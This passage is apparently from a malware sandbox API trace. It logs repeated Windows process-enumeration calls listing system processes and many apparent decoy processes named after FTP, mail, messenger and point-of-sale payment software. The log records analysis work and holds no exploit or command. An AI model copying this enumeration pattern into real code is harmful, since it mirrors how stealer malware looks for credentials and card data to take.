th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0218.128] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0218.130] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0218.192] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.194] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0218.197] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0218.199] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0218.200] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0218.202] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0218.203] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0218.205] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0218.207] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0218.209] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0218.210] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0218.213] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0218.215] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0218.216] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0218.218] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0218.219] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0218.221] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0218.223] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0218.224] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0218.226] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0218.227] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0218.279] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0218.281] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0218.282] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0218.284] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0218.286] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0218.287] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0218.289] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0218.291] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0218.293] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0218.295] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0218.297] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0218.300] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0218.302] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0218.304] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0218.306] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0218.308] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0218.310] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0218.336] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0218.339] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0218.342] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0218.344] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0218.346] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0218.348] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0218.351] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0218.353] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0218.356] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0218.358] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0218.361] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0218.363] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0218.366] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0218.368] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0218.370] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0218.376] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0218.378] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0218.381] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0218.383] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0218.385] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0218.389] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0218.391] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0218.393] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0218.395] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0218.397] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0218.400] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0218.402] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0218.407] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0218.409] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0218.411] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0218.416] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0218.418] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0218.420] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0218.422] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0218.424] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0218.426] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0218.428] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0218.430] Process32Next (in: hSnapshot=0x2194, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0218.432] CloseHandle (hObject=0x2194) returned 1 [0218.432] Sleep (dwMilliseconds=0x64) [0218.555] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x344 [0218.569] Process32First (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.572] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0218.574] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0218.576] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.578] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0218.581] Process32Next (in: hSnapshot=0x344, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, 